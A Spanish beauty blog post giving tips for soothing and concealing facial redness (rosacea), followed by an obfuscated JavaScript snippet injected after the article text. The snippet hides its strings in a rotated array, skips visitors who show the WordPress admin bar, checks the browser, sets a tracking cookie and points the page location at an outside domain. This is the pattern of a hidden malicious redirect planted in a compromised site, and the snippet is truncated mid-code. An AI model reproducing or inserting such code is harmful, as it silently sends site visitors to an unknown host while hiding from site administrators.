En ocasiones, nuestra piel es tan sensible que tiende a mostrar rojeces y diferentes imperfecciones. Lucir una piel bonita es posible. Y para obtener unos resultados espectaculares comienza por cuidar y limpiar tu piel a diario.

Las rojeces de la cara son una señal de sensibilidad y también se llaman Rosácea. Estas zonas, suelen estar más calientes que el resto y en ocasiones muestran sensación de picor y quemazón.

Lo mejor, es que primero acudas a tu dermatólogo, pero aún así, puedes probar a limpiarte la piel con productos para pieles sensibles y después aplicar un loción en las zonas afectadas con unas gasas humedecidas. Utiliza siempre cosméticos para pieles sensibles, adaptados a tus necesidades.

Procura llevar a cabo una serie de pasos básicos para mejorar el aspecto de tu rostro:

• Desde los primeros rayos de sol, utiliza siempre crema solar con factor de protección alto. Aunque este morena, no olvides usar siempre las cremas solares en rostro y cuerpo, antes de salir de casa a intenta no exponerte al sol en las horas principales del día, es decir, de 10 a 16h.

• Utiliza a diario una crema calmante, que mejore la micro-circulación y tonifique la pared de los pequeños vasos sanguíneos que se muestran, sobre todo, en la parte de tus mejillas en forma de arañas varicosas.

• Evitar el uso de jabones para la cara, así como las lociones con alcohol y las exfoliaciones.

• Es recomendable utilizar, una vez por semana, una mascarilla calmante e hidratante. Déjalo actuar unos 20 minutos y luego retira el exceso con un algodón.

 

Por otro lado, también puedes utilizar determinados productos cosméticos que te ayudarán a camuflar tus rojeces. Utiliza el lápiz corrector iluminador para iluminar tu piel y borrar las pequeñas manchas y rojeces. Si quieres, además, lucir un look natural, con una piel lisa y con un color saludable, aplica una BB creme de la marca que queráis, un Blemish Balm que en contacto con la piel unifica el rostro y camufla las rojeces producidas por tratamientos abrasivos, con una textura absolutamente revolucionaria que se adapta a tu tono de piel.

 

Alivia y calma tu piel. Utiliza los productos adecuados,  lleva  a cabo  estas recomendaciones y cuida tu piel diariamente, ¡verás como luces una piel sin rojeces envidiable!

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone